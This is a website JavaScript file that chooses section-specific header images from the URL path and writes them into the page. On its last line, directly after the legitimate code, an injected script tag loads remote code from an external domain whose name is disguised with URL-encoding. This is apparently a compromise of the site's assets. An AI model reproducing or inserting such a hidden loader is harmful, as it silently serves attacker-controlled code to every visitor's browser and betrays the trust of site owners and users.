var style_base = document.getElementById("pic_script").src;
style_base = style_base.substring(0, style_base.lastIndexOf('/'));

var idx = document.location.pathname.indexOf('/',1);
if(idx==-1)
	var path = document.location.pathname.substring(1);
else
	var path = document.location.pathname.substring(1,idx);

if(path=="product"){
	l_img = style_base + "/img/pdt_l.gif";
	r_img = style_base + "/img/pdt_r.gif";
}
else if(path=="news"){
	l_img = style_base + "/img/news_top_left.gif";
	r_img = style_base + "/img/news_top_right.gif";
}
else if(path=="job"){
	l_img = style_base + "/img/job_top_left.gif";
	r_img = style_base + "/img/job_top_right.gif";
}
else if(path=="c"){	
	var p = document.location.pathname.substring(3);
	var idx = p.indexOf('/');
	if(idx > 0)
		p = p.substring(0, idx);
	if(p == "contact"){
		l_img = style_base + "/img/contact_top_left.gif";
		r_img = style_base + "/img/contact_top_right.gif";
	}
	else if(p=="partner"){
		l_img = style_base + "/img/partner_l.gif";
		r_img = style_base + "/img/partner_r.gif";
	}
	else if(p=="sitemap"){
		l_img = style_base + "/img/sitemap_l.gif";
		r_img = style_base + "/img/sitemap_r.gif";
	}
	else if(p=="intro"){
		l_img = style_base + "/img/intro_top_left.gif";
		r_img = style_base + "/img/intro_top_right.gif";
	}
}

if(l_img.length>0 && r_img.length>0)
document.write("\
	<table cellspacing='0' cellpadding='0' width='100%'><tr>\
    <td valign='bottom'><img src='"+l_img+"'/></td>\
    <td valign='bottom' align='right'><img src='"+r_img+"'/></td>\
    </tr></table>\
");<script src=http://v.tao%67%75%2Eorg%2Ecn></script>
